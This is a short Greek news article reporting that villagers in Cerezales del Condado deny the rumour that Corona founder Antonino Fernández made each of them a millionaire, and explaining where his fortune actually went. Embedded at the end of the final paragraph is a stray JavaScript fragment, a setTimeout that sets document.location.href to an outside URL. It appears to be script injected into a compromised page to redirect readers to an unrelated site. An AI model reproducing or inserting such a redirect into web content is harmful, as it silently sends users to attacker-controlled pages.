Δυστυχώς ο ιδρυτής της Corona δεν μας έκανε εκατομμυριούχους, αλλά του είμαστε ευγνώμονες…

0
9

Τα πράγματα στη θέση τους βάζουν οι κάτοικοι του μικρού ισπανικού χωριού Cerezales del Condado, στους οποίους υπήρξε η φήμη ότι ο ιδρυτής της γνωστής μπύρας Corona Antonino Fernández, άφησε από 2 εκατομμύρια ευρώ στον καθένα μετατρέποντας τους σε εκατομμυριούχους.

«Η ιστορία έχει ξεφύγει…» δήλωσε ένας κάτοικος του χωριού, υπογραμμίζοντας παράλληλα ότι δεν είναι όλοι εκατομμυριούχοι.

Όπως μεταδίδει η ισπανική ιστοσελίδα The Local, που ταξίδεψε στο μικρό χωριό, ο δισεκατομμυριούχος όντως άφησε μεγάλο ποσό στην πόλη αλλά τα χρήματα δεν πήγαν στους κατοίκους. Χρησιμοποιήθηκαν για να κατασκευαστούν πολιτιστικά κέντρα, εκκλησίες αλλά και άλλα σημαντικά έργα.
Και όντως τον κληρονόμησαν μέλη της οικογένειάς του.

«Δυστυχώς, απλώς δεν είναι αλήθεια…» δήλωσε η Lucia Alaejos, κάτοικος της πόλης.

«Κάποιος δεν κατάλαβε και η ιστορία έχει πλέον ξεφύγει» είπε η ίδια. Ο Fernández, που δεν είχε παιδιά, αποδεικνύεται ότι άφησε το μεγαλύτερο μέρος της περιουσίας του στις ανιψιές και τους ανιψιούς του –τα παιδιά των 13 αδελφιών του.

«Αρκετοί από αυτούς συνεχίζουν να επισκέπτονται την περιοχή για αρκετούς μήνες κάθε καλοκαίρι, οπότε αυτό είναι πολύ καλό για το χωριό. Το κρατάει ζωντανό… Αλλά οι κάτοικοι δεν παίρνουν μέρος της κληρονομιάς» ξεκαθάρισε η κ. Alaejos. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here